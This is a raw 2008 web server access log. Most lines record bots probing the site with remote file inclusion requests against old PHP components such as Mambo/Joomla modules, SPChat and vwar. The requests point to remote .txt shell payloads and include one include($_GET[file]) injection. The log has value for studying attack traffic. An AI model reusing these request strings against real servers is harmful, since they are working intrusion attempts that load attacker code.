213.188.130.113 - - [16/Aug/2008:20:08:30 -0500] "GET /logs/access_log.1214524800//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:08:31 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:08:31 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:08:51 -0500] "GET /logs/access_log.1206230400//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:08:51 -0500] "GET //modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:08:52 -0500] "GET /logs//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
203.183.129.14 - - [16/Aug/2008:20:09:21 -0500] "GET /logs/access_log.1206230400//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
203.183.129.14 - - [16/Aug/2008:20:09:22 -0500] "GET //modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
203.183.129.14 - - [16/Aug/2008:20:09:22 -0500] "GET /logs//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:09:35 -0500] "GET /logs/access_log.1206230400//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:09:35 -0500] "GET //modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:09:35 -0500] "GET /logs//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.248.110.152 - - [16/Aug/2008:20:09:50 -0500] "GET /logs/access_log.1214179200/modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:09:53 -0500] "GET /logs/access_log.1206230400//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:09:53 -0500] "GET //modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:09:53 -0500] "GET /logs//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
72.52.212.40 - - [16/Aug/2008:20:10:23 -0500] "GET /logs/access_log.1214524800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.811"
72.52.212.40 - - [16/Aug/2008:20:10:23 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
72.52.212.40 - - [16/Aug/2008:20:10:23 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
72.52.212.40 - - [16/Aug/2008:20:10:33 -0500] "GET /logs/access_log.1211500800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.811"
212.150.247.23 - - [16/Aug/2008:20:10:37 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
212.150.247.23 - - [16/Aug/2008:20:10:37 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
69.64.34.172 - - [16/Aug/2008:20:12:03 -0500] "GET /logs/access_log.1214524800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:12:19 -0500] "GET /logs/access_log.1214179200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:13:49 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
212.150.247.23 - - [16/Aug/2008:20:13:49 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
203.160.122.193 - - [16/Aug/2008:20:13:50 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 304 - "http://images.google.co.nz/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat6.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&h=246&w=236&sz=19&hl=en&start=82&um=1&tbnid=Js0hVP5NTJi0TM:&tbnh=110&tbnw=106&prev=/images%3Fq%3D1950s%2Btattoo%2Bflash%26start%3D72%26ndsp%3D18%26um%3D1%26hl%3Den%26sa%3DN""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:20:13:50 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:20:13:51 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:20:13:51 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:20:13:51 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:20:13:51 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
69.64.34.172 - - [16/Aug/2008:20:14:37 -0500] "GET /logs/access_log.1206230400//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:14:37 -0500] "GET //modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:14:37 -0500] "GET /logs//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
217.23.156.220 - - [16/Aug/2008:20:14:52 -0500] "GET /logs//errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
217.23.156.220 - - [16/Aug/2008:20:14:52 -0500] "GET //errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:15:17 -0500] "GET /logs/access_log.1206230400//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:15:17 -0500] "GET //modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:15:17 -0500] "GET /logs//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:15:43 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:15:43 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:16:39 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
212.150.247.23 - - [16/Aug/2008:20:16:39 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
209.160.73.116 - - [16/Aug/2008:20:16:45 -0500] "GET //modules/4nAlbum/public/displayCategory.php?adminpath=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
209.160.73.116 - - [16/Aug/2008:20:16:47 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?adminpath=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 332 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
204.15.10.22 - - [16/Aug/2008:20:16:51 -0500] "GET //modules/4nAlbum/public/displayCategory.php?adminpath=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
204.15.10.22 - - [16/Aug/2008:20:16:51 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?adminpath=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 332 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
69.73.189.205 - - [16/Aug/2008:20:16:57 -0500] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:16:57 -0500] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:17:19 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:17:19 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
62.169.0.50 - - [16/Aug/2008:20:17:26 -0500] "GET //modules/4nAlbum/public/displayCategory.php?adminpath=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 327 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
62.169.0.50 - - [16/Aug/2008:20:17:26 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?adminpath=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 332 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
193.178.228.12 - - [16/Aug/2008:20:17:33 -0500] "GET //modules/4nAlbum/public/displayCategory.php?adminpath=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
193.178.228.12 - - [16/Aug/2008:20:17:33 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?adminpath=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
58.25.217.217 - - [16/Aug/2008:20:17:46 -0500] "GET /logs/access_log.1208044800/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
58.25.217.217 - - [16/Aug/2008:20:17:48 -0500] "GET /errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
58.25.217.217 - - [16/Aug/2008:20:17:51 -0500] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.55.113.226 - - [16/Aug/2008:20:17:58 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:18:01 -0500] "GET /logs/access_log.1213488000//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:18:02 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:18:02 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:18:20 -0500] "GET //modules/4nAlbum/public/displayCategory.php?adminpath=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
212.150.247.23 - - [16/Aug/2008:20:18:24 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?adminpath=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 332 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
213.188.130.113 - - [16/Aug/2008:20:18:43 -0500] "GET /logs/access_log.1214179200//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:19:50 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
212.150.247.23 - - [16/Aug/2008:20:19:50 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.174.249.240 - - [16/Aug/2008:20:20:04 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 343 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
217.174.249.240 - - [16/Aug/2008:20:20:05 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
69.73.189.205 - - [16/Aug/2008:20:20:19 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:20:19 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:20:39 -0500] "GET /logs/access_log.1206230400//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:20:40 -0500] "GET //modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:20:40 -0500] "GET /logs//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:20:40 -0500] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:20:41 -0500] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:21:09 -0500] "GET /logs/access_log.1213488000//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:21:09 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:21:09 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.201.218.158 - - [16/Aug/2008:20:21:38 -0500] "GET /logs/?sourcedir=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 200 95581 "-""libwww-perl/5.805"
193.201.218.158 - - [16/Aug/2008:20:21:46 -0500] "GET /?sourcedir=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:21:51 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:21:51 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:22:33 -0500] "GET /logs/access_log.1214179200//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:22:47 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
212.150.247.23 - - [16/Aug/2008:20:22:47 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
213.188.130.113 - - [16/Aug/2008:20:23:08 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:23:09 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:23:11 -0500] "GET /logs/access_log.1211500800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:23:11 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:23:11 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:24:41 -0500] "GET /logs/access_log.1213401600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.181.210.195 - - [16/Aug/2008:20:25:09 -0500] "GET /logs/access_log.1206230400//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
202.181.210.195 - - [16/Aug/2008:20:25:09 -0500] "GET //modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
202.181.210.195 - - [16/Aug/2008:20:25:10 -0500] "GET /logs//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
212.150.247.23 - - [16/Aug/2008:20:25:43 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/3.0 (OS/2; U)"
212.150.247.23 - - [16/Aug/2008:20:25:43 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/3.0 (OS/2; U)"
74.6.18.230 - - [16/Aug/2008:20:26:12 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.220 - - [16/Aug/2008:20:26:13 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
206.252.131.151 - - [16/Aug/2008:20:26:32 -0500] "GET /logs/access_log.1214524800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:20:26:32 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:20:26:32 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:20:26:32 -0500] "GET /logs/access_log.1214524800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:20:26:32 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:20:26:32 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:20:26:54 -0500] "GET /logs/access_log.1211500800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:20:26:54 -0500] "GET /logs/access_log.1211500800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
202.181.210.195 - - [16/Aug/2008:20:27:11 -0500] "GET /logs/access_log.1206230400//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
202.181.210.195 - - [16/Aug/2008:20:27:12 -0500] "GET //modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
202.181.210.195 - - [16/Aug/2008:20:27:12 -0500] "GET /logs//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
213.188.130.113 - - [16/Aug/2008:20:28:12 -0500] "GET /logs/access_log.1211500800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
